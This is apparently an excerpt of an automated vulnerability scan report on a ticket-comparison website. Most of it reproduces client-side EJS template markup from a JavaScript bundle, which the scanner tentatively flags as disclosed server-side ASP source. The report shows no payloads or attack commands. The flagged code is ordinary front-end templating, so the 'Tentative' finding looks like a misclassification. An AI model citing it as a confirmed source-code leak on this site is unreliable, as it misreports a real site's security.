<input type="checkbox" id="areas[]-<%= facets[i].id%>" name="areas[]" value="<%= facets[i].id%>" class="<%= outer_class_name %>" <%=facets[i][\'start_checked\'] ? \' checked="checked"\' : \'\' %>/>\n\
<label class="static-list-label"><%= facets[i].name %></label>\n\
<% if (facets[i].children) { %>\n\
<span class=\'expandable\'>
...[SNIP]...
<ul class="mSecList" >\n\
<% for(var j=0; j < facets[i].children.length; j++) { %>\n\
<li class="mSecListItems">
...[SNIP]...
<input type="checkbox" class="<%= child_class_name %>" name="secs[]" value="<%= facets[i].children[j].id %>" <%=facets[i].children[j][\'start_checked\'] ? \' checked="checked"\' : \'\' %> />
...[SNIP]...
<label> <%= facets[i].children[j].name %> </label>
...[SNIP]...
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel_inner.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
</div>
...[SNIP]...
<div class="providerNotes">\n\
<%= notes %>\n\
</div>
...[SNIP]...
<tbody>\n\
<% var eTickets = false, eTicket, i; %>\n\
<% for (i = 0; i < deals.length; i++) { %>\n\
<%\n\
if (eTicketsUI && deals[i].delivery && deals[i].delivery[0] == \'do_et\') {\n\
eTicket = true;\n\
eTickets = true;\n\
} else {\n\
eTicket = false;\n\
}\n\
%>
\n\
<tr class="providerRow <%= (i != deals.length - 1) ? \'notlast\' : \'\'%>">
...[SNIP]...
<td class="providerName<%= eTicket ? \' e-ticket\' : \'\' %>"><%= deals[i].broker %></td>
...[SNIP]...
<td class="salePrice<%= FS.config.view.props.highlightBasePrice ? \' boldPrice\' : \'\' %>"><%= float_to_currency(deals[i].salePrice, 2) %></td>
...[SNIP]...
<td class="handlingFee"><%= float_to_currency(deals[i].handlingFee, 2) %></td>
...[SNIP]...
<td class="totalPrice<%= FS.config.view.props.highlightBasePrice ? \'\' : \' boldPrice\' %>"><%= float_to_currency(deals[i].salePrice + deals[i].handlingFee, 2) %></td>
...[SNIP]...
<div class="blueButton_small" data-ticketSetId="<%= deals[i].id %>" data-ctx="c=<%= srcCtx %>;mt=<%= mapType %>;tsp=<%= i + 1 %>;dt=<%= totalDeals %>;lpos=<%= listPosition %>" data-dealPosition="<%= i %>"><%= goButtonText %></div>
...[SNIP]...
<div class="additionalNotes">\n\
<% if (eTickets) { %>\n\
<div><%= img_tag(cdn_asset_path(\'/images/e-ticket.png\'), \'eTicket\', { "Class": "e-ticket" } ) %> eTicket</div>
...[SNIP]...
<div class="providerFeesNote"><%= detailPanelNote %></div>
...[SNIP]...
</span>\n\
<% if (sharingEnabled) { %>\n\
<span class ="panelLink shareLink">
...[SNIP]...
<% } %>\n\
<% if (shortListEnabled) { %>\n\
<% if (saved) {\n\
var text = \'Saved\';\n\
var savedCss = " savedOffer";\n\
} else {\n\
var text = \'Save\';\n\
var savedCss = "";\n\
} %>
\n\
<span class ="panelLink saveLink<%= savedCss %>"><a href="javascript:void(0)"><%= text %></a>
...[SNIP]...
<div class="seatprice" data-ticketSetId="<%= ticketId %>" data-ctx="c=<%= srcCtx %>;mt=<%= mapType %>;tsp=0;dt=<%= totalDeals %>;lpos=<%= listPosition %>">\n\
<div class="<%= TicketListFormattingHelpers.choosePriceClass(price) %>">
...[SNIP]...
<span class="price"><%= TicketListFormattingHelpers.addCommas(price) %></span>
...[SNIP]...
<div class="select-btn-<%= goButtonClass %> new-go-button"><%= goButtonText %></div>\n\
<% if (FS.config.view.props.highlightBasePrice) { %>\n\
<div class="total-with-fee">$<%= TicketListFormattingHelpers.addCommas(Math.ceil(totalPrice)) %> with<br/> <%= broker.length > 13 ? \'seller\' : broker %> fees</div>
...[SNIP]...
<div id="<%= listPosition %><%= domIdModifier %>-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.props.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'comparableKey\': comparableKey, \'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': saved})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
</span><%= link_to("Share on Facebook",\'javascript:InlineUtil.ticketSetFBShare("\' + shareId + \'&sec=\' + section + \'&row=\' + row + \'&prc=\' + price + \'", this);\') %></li>
...[SNIP]...
</span><%= link_to("Post on Twitter", twitterUrl +\'&tss_=\' + shareId + \'&sec=\' + section + \'&row=\' + row + \'&prc=\' + price, {\'target\': "_blank", \'onclick\': "window.open(this.href,\'sharing_win\',\'height=540,width=763,scrollbars=yes,resizable=no,toolbar=false,location=false\'); return false;"}) %></li>
...[SNIP]...
</span><%= link_to("Email to a friend", emailUrl +\'&tss_=\' + shareId + \'&sec=\' + section + \'&row=\' + row + \'&prc=\' + price, {\'target\': "_blank", \'onclick\': "window.open(this.href,\'sharing_win\',\'height=540,width=490,scrollbars=yes,resizable=no,toolbar=false,location=false\'); return false;"}) %></li>
...[SNIP]...
<div class="tixLogo">\n\
<%= img_tag(cdn_asset_path(\'/images/logos/provider-medium-compact-\'+brokerId+\'.gif\'), \'broker logo\') %>\n\
</div>
...[SNIP]...
<div class="best-value-<%= bvTag %>">
...[SNIP]...
<strong>\n\
<% if ((typeof row_style === \'undefined\') || row_style == \'both\') { %>\n\
<span class="ticket-section"><%= section %></span>
...[SNIP]...
<span>Row&nbsp;<%= row %></span>\n\
<% } else if (row_style == \'row_only\') { %>\n\
<span class="row-only-view" >Row:&nbsp;<%= row %></span>
...[SNIP]...
<span class="series-date"><%= dateTime %></span>\n\
<div class="handling">\n\
<%= splitsText %>\n\
<% if (eTicketsUI && hasETicket) { %>\n\
<%= img_tag(cdn_asset_path(\'/images/e-ticket.png\'), \'eTicket\', { "Class": "e-ticket", "title": "eTicket" } ) %>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-ticket-listing" class="new-seat-row" onmouseover="SeatsPageController.highlightSet(\'<%= ticketId %>\',true);" onmouseout="SeatsPageController.highlightSet(\'<%= ticketId %>\',false);">
...[SNIP]...
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox.ejs\').render({\'ticketId\': ticketId, \'listPosition\': \'NA\', \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= SeatsPageController.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': true})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': \'NA\', \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div class="new-seat-row" onmouseover="SeatsPageController.highlightSet(\'<%= ticketId %>\',true);" onmouseout="SeatsPageController.highlightSet(\'<%= ticketId %>\',false);">
...[SNIP]...
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/soldpricebox.ejs\').render({\'price\': price})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= SeatsPageController.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': true})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': \'NA\', \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'row_style\': \'row_only\', \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'comparableKey\': comparableKey, \'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': saved})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'row_style\': \'none\', \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>\n\
<% if (ugcEnabled) { %>\n\
<div class="seat-view-vfs">
...[SNIP]...
<div class="seat-view-image">\n\
<%= photos %>\n\
<div class="seat-view-link-lt">
...[SNIP]...
<div class="sec-rev-avail sec-rev-state<%= hasRevTag %>">\n\
<% if (readReviewsEnabled) { %>\n\
<%= sampleRevTxt %>&nbsp;<%=link_to("Read reviews" + revCnt, "#", {\'class\': \'sec-rr-link\'}) %>\n\
<% } %>
...[SNIP]...
<div class="sec-rev-none sec-rev-state<%= noRevTag %>">\n\
<% if (writeEnabled) { %>\n\
Be the first to review this section!&nbsp;\n\
<a href="/reviews/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
...[SNIP]...
</a>\n\
<%= link_to("&nbsp;", \'/reviews_photos_intro\', {target: \'_blank\', \'class\': \'info-icon-link\'}) %>\n\
<% } %>
...[SNIP]...
</div>\n\
<% if (uploadEnabled) { %>\n\
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" class="seat_view_upload-phot-link" target="_blank">
...[SNIP]...
<div class="seat-view-link-rt">\n\
<%= link_to(\'Zoom into map\',"javascript:void(0)", {\'class\': \'zoom-to-map\'}) %>\n\
</div>
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>\n\
<% if (ugcEnabled) { %>\n\
<div class="seat-view-vfs">
...[SNIP]...
<div class="seat-view-image">\n\
<%= photos %>\n\
<div class="seat-view-link-lt">
...[SNIP]...
<div class="sec-rev-avail sec-rev-state<%= hasRevTag %>">\n\
<% if (readReviewsEnabled) { %>\n\
<%= sampleRevTxt %>&nbsp;<%=link_to("Read reviews" + revCnt, "#", {\'class\': \'sec-rr-link\'}) %>\n\
<% } %>
...[SNIP]...
<div class="sec-rev-none sec-rev-state<%= noRevTag %>">\n\
<% if (writeEnabled) { %>\n\
Be the first to review this section!&nbsp;\n\
<a href="/reviews/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
...[SNIP]...
</a>\n\
<%= link_to("&nbsp;", \'/reviews_photos_intro\', {\'target\': \'_blank\', \'class\': \'info-icon-link\'}) %>\n\
<% } %>
...[SNIP]...
</div>\n\
<% if (uploadEnabled) { %>\n\
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" class="seat_view_upload-phot-link" target="_blank">
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>
...[SNIP]...

16.5. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://cdn-3.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: Z9FoeWr+ih96b6lf6CpPuGI5Q+iohS1B0OD9/xoR6URU8iUBbVK0gBV5FOOmbIfK
x-amz-request-id: EC2B59ADFAB49C95
Date: Tue, 12 Jul 2011 18:04:47 GMT
x-amz-meta-group: 0
x-amz-meta-owner: 0
x-amz-meta-permissions: 33204
Cache-Control: max-age=31536000
Expires: Wed, 11 Jul 2012 06:39:51 GMT
Last-Modified: Tue, 12 Jul 2011 06:42:23 GMT
ETag: "40bbfaa121237bb7aa5b8c6dcdbdee4f"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 157752
Server: AmazonS3
Age: 606636
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 94d0c3f8dc004c8cda6bc23e7dceb0ef72103b97c12bed047428c7580127f59693327d74dd815b2a
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

(function($){var topics={};$.fn.publish=function(topic,args,sync){if(typeof topics[topic]=="undefined"){return this;}
var args=args||[],argsLength=args.length,t=topics[topic],l=t.length,that=this,publ
...[SNIP]...
each(_.functions(obj),function(name){addToWrapper(name,_[name]=obj[name]);});};var idCounter=0;_.uniqueId=function(prefix){var id=idCounter++;return prefix?prefix+id:id;};_.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};_.template=function(str,data){var c=_.templateSettings;var tmpl='var __p=[],print=function(){__p.push.apply(__p,arguments);};'+'with(obj||{}){__p.push(\''+
str.replace(/\\/g,'\\\\').replace(/'/g,"\
...[SNIP]...
ame:userName,userXid:user.get("userXid"),venueName:venueName};var name=eventName;if(opts.nameTemplate){name=this._renderTemplate(opts.nameTemplate,context);}
var captionTemplate=opts.captionTemplate||"<%= eventDate %> in <%= eventCity %>.";var caption=this._renderTemplate(captionTemplate,context);var hash=opts.hash;if(opts.hashTemplate){hash=this._renderTemplate(opts.hashTemplate,context);}
var params={method:'feed',name:name,caption:
...[SNIP]...
entifyingData:function(){var idString=this.uid+'|'+this.style+'|'+this.channel+'|'+this.ctx;return idString;}};if(typeof preCompiledEJSTemplates=='undefined'){var preCompiledEJSTemplates={};}
var str='<% var broker_ids = [];\n\
for(broker_id in brokers) {\n\
broker_ids[brokers[broker_id][\'sort_order\']] = broker_id;\n\
};\n\
%>
\n\
<div id="broker_filter" class="in-map-filter-holder">
...[SNIP]...
<h2>Providers (<%= num_brokers %>)</h2>
...[SNIP]...
<ul>\n\
<% for(var i = 0; i < broker_ids.length; i++) { %>\n\
<li class="in-map-filter-<%= logos_enabled ? "bg" : "no" %>-img">
...[SNIP]...
<div class="in-map-filter-labels">\n\
<% if(logos_enabled) { %>\n\
<%= img_tag(cdn_asset_path(\'/images/logos/provider-medium-\'+ broker_ids[i] +\'.gif\'), broker_id +\'_id\') %>\n\
<% } %>
...[SNIP]...
<label for="<%= broker_ids[i] %>_id">\n\
<%= brokers[broker_ids[i]]["name"] %> (<strong><%= brokers[broker_ids[i]]["seat_count"] %></strong>)\n\
<% if (channel.forceParam) {\n\
var link = \'/brokers/\' + broker_ids[i] + \'/details?ch=\' + channel.code;\n\
}\n\
else {\n\
var link = \'/brokers/\' + broker_ids[i] + \'/details\';\n\
}\n\
%>
\n\
[<a href=\'<%= link %>\' onclick=\'broker_popup(this.href); return false;\'>
...[SNIP]...
<input type="checkbox" class="flt_brk" name="brks[]" id="<%= broker_ids[i] %>_id" value="<%= broker_ids[i] %>" <%= brokers[broker_ids[i]][\'start_checked\'] ? \' checked="checked"\' : \'\' %>/>
...[SNIP]...
<div id="locationList">\n\
<%= lookupEjsTemplate(\'seats_page/location_filter_inner.ejs\').render({\'facets\': facets, \'outer_class_name\': "flt_area", \'outer_input_name\': \'areas[]\', \'child_class_name\': \'flt_sec\', \'child_input_name\': \'secs[]\'})%>\n\
<div class="in-map-select">
...[SNIP]...
<ul>\n\
<% for(var i = 0; i < facets.length; i++) { %>\n\
<li class="static-list-ele">
...[SNIP]...
<input type="checkbox" id="areas[]-<%= facets[i].id%>" name="areas[]" value="<%= facets[i].id%>" class="<%= outer_class_name %>" <%=facets[i][\'start_checked\'] ? \' checked="checked"\' : \'\' %>/>\n\
<label class="static-list-label"><%= facets[i].name %></label>\n\
<% if (facets[i].children) { %>\n\
<span class=\'expandable\'>
...[SNIP]...
<ul class="mSecList" >\n\
<% for(var j=0; j < facets[i].children.length; j++) { %>\n\
<li class="mSecListItems">
...[SNIP]...
<input type="checkbox" class="<%= child_class_name %>" name="secs[]" value="<%= facets[i].children[j].id %>" <%=facets[i].children[j][\'start_checked\'] ? \' checked="checked"\' : \'\' %> />
...[SNIP]...
<label> <%= facets[i].children[j].name %> </label>
...[SNIP]...
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel_inner.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
</div>
...[SNIP]...
<div class="providerNotes">\n\
<%= notes %>\n\
</div>
...[SNIP]...
<tbody>\n\
<% var eTickets = false, eTicket, i; %>\n\
<% for (i = 0; i < deals.length; i++) { %>\n\
<%\n\
if (eTicketsUI && deals[i].delivery && deals[i].delivery[0] == \'do_et\') {\n\
eTicket = true;\n\
eTickets = true;\n\
} else {\n\
eTicket = false;\n\
}\n\
%>
\n\
<tr class="providerRow <%= (i != deals.length - 1) ? \'notlast\' : \'\'%>">
...[SNIP]...
<td class="providerName<%= eTicket ? \' e-ticket\' : \'\' %>"><%= deals[i].broker %></td>
...[SNIP]...
<td class="salePrice<%= FS.config.view.props.highlightBasePrice ? \' boldPrice\' : \'\' %>"><%= float_to_currency(deals[i].salePrice, 2) %></td>
...[SNIP]...
<td class="handlingFee"><%= float_to_currency(deals[i].handlingFee, 2) %></td>
...[SNIP]...
<td class="totalPrice<%= FS.config.view.props.highlightBasePrice ? \'\' : \' boldPrice\' %>"><%= float_to_currency(deals[i].salePrice + deals[i].handlingFee, 2) %></td>
...[SNIP]...
<div class="blueButton_small" data-ticketSetId="<%= deals[i].id %>" data-ctx="c=<%= srcCtx %>;mt=<%= mapType %>;tsp=<%= i + 1 %>;dt=<%= totalDeals %>;lpos=<%= listPosition %>" data-dealPosition="<%= i %>"><%= goButtonText %></div>
...[SNIP]...
<div class="additionalNotes">\n\
<% if (eTickets) { %>\n\
<div><%= img_tag(cdn_asset_path(\'/images/e-ticket.png\'), \'eTicket\', { "Class": "e-ticket" } ) %> eTicket</div>
...[SNIP]...
<div class="providerFeesNote"><%= detailPanelNote %></div>
...[SNIP]...
</span>\n\
<% if (sharingEnabled) { %>\n\
<span class ="panelLink shareLink">
...[SNIP]...
<% } %>\n\
<% if (shortListEnabled) { %>\n\
<% if (saved) {\n\
var text = \'Saved\';\n\
var savedCss = " savedOffer";\n\
} else {\n\
var text = \'Save\';\n\
var savedCss = "";\n\
} %>
\n\
<span class ="panelLink saveLink<%= savedCss %>"><a href="javascript:void(0)"><%= text %></a>
...[SNIP]...
